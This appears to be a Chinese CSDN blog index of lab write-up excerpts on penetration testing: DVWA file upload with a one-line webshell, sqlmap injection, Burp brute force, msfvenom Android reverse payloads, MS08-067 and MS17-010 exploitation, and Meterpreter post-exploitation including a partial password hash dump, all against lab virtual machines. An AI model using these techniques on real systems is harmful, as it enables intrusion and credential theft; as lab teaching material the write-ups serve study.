![](https://img-blog.csdnimg.cn/20190918140158853.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
Windows网络服务渗透测试实战
Windows网络服务渗透测试实战
懒笑翻
这个作者很懒,什么都没留下…
展开
-
web渗透测试实战-文件上传
一、实验项目名称web渗透测试实战-文件上传二、实验目的及要求熟悉文件上传漏洞。熟悉一句话木马编写熟练使用菜刀工具三、复现步骤(附加文字说明加截图)DVWAfile-upload复现(low、medium、high)1、开启win7虚拟机,查看win7的IP2、在本地新建一个php文件,文件内容如下:(‘lan’内容是自定义的口令)3、在本机链接win7 192.168.232.150http://192.168.232.150/dvwa/4...原创 2022-05-26 21:20:23 · 1016 阅读 · 2 评论 -
web渗透测试实战-SQLMAP
一、实验项目名称web渗透测试实战-SQLMAP二、实验目的及要求熟悉SQL注入漏洞原理熟悉SQLMAP工具使用。1、获取数据库信息:数据库漏洞、数据库名、数据库版本等python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51"原创 2022-05-26 10:01:40 · 8207 阅读 · 0 评论 -
web渗透测试实战-暴力破解(low、medium、high)
一、实验项目名称web渗透测试实战-暴力破解(low、medium、high)二、实验目的及要求熟悉常见web漏洞。熟悉通过burp进行暴力破解。三、复现步骤1、在虚拟机win7中打开phpstudy启动phpstudy2、查看win7的IP(网络NAT模式)192.168.232.1443、在火狐设置代理并安装证书搜索“代理”下载证书 访问127.0.0.1:8080搜索“证书” 导入刚下载的证书4、在火狐增加扩展...原创 2022-05-24 17:04:28 · 1575 阅读 · 0 评论 -
Windows网络服务渗透测试实战-MSF恶意程序利用
一、实验项目名称Windows网络服务渗透测试实战-MSF恶意程序利用二、实验目的及要求掌握对MSF恶意程序利用的方法。熟悉Metasploit终端的使用方法。熟悉通过meterpreter进行后渗透操作对安卓msf上线进行图标隐藏,pc上线自行进行操作截图一、Android端1、查看kali的IP 192.168.43.892、生成一个apk文件到桌面命令中的lhost为kali系统的IP,lport为监听端口,此处设置9988msfvenom -p and.原创 2022-05-20 12:00:11 · 4117 阅读 · 0 评论 -
Windows网络服务渗透测试实战-跨网段攻击
一、实验项目名称Windows网络服务渗透测试实战-跨网段攻击二、实验目的及要求掌握对跨网段攻击的方法。熟悉Metasploit终端的使用方法。熟悉通过meterpreter进行后渗透操作获取winxp系统管理员admin的密码,并使xp系统关机----基础配置----1、选择win72.选择winXP3、选择kali4、查看kali的ip5、查看winXP的ip6、查看win7的IP总结如下:...原创 2022-05-19 11:03:14 · 6245 阅读 · 3 评论 -
休息休息~~~~Happy一下
msfconsole 随机图好看好玩┌──(kali㉿kali)-[~/Desktop]└─$ sudo msfconsole[sudo] password for kali: IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|\`.""'. II 6. .P : ...原创 2022-05-18 16:10:53 · 222 阅读 · 0 评论 -
shell win7 乱码问题
chcp 65001meterpreter > shellProcess 14668 created.Channel 1 created.Microsoft Windows [�汾 6.1.7601]��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\Windows\system32>ipconfigipconfigWindows IP �������������� Bluetoo...原创 2022-05-18 15:52:42 · 499 阅读 · 0 评论 -
Windows网络服务渗透测试实战-MS08-067
一、实验项目名称Windows网络服务渗透测试实战-MS08-067二、实验目的及要求掌握对MS08-067漏洞攻击的方法。熟悉Metasploit终端的使用方法。熟悉通过meterpreter进行后渗透操作复现环境靶机:windows xp sp3 IP:192.168.232.128攻击机:kali-linux-2021.3 IP:192.168.232.141复现流程sudo msfconsole扫描目标靶机nmap -sS 192.168.232.12.原创 2022-05-18 15:04:49 · 634 阅读 · 0 评论 -
Windows网络服务渗透测试实战-Meterpreter后渗透
一、实验项目名称Windows网络服务渗透测试实战-Meterpreter后渗透二、实验目的及要求掌握对MS17-010漏洞攻击的方法。熟悉Metasploit终端的使用方法。熟悉通过meterpreter进行后渗透操作三、复现步骤(附加文字说明加截图)1、查看系统信息屏幕快照上传下载 密码获取Administrator:500:aad3b435b51404eeaad3b...原创 2022-05-17 18:34:53 · 2683 阅读 · 1 评论 -
Windows网络服务渗透测试实战MS17-010漏洞复现
一、实验项目名称Windows网络服务渗透测试实战MS17-010漏洞复现二、实验目的及要求熟悉Metasploit终端的使用方法;掌握对MS17-010漏洞攻击的方法。三、复现步骤(附加文字说明加截图)1、NAT模式Kali-Linux :192.168.232.141Windows 7: 192.168.232.1422、查看ipkali:ip awin7:ipconfig3、重启网卡service networking restart4、测试是否连通k原创 2022-05-16 17:54:00 · 3372 阅读 · 0 评论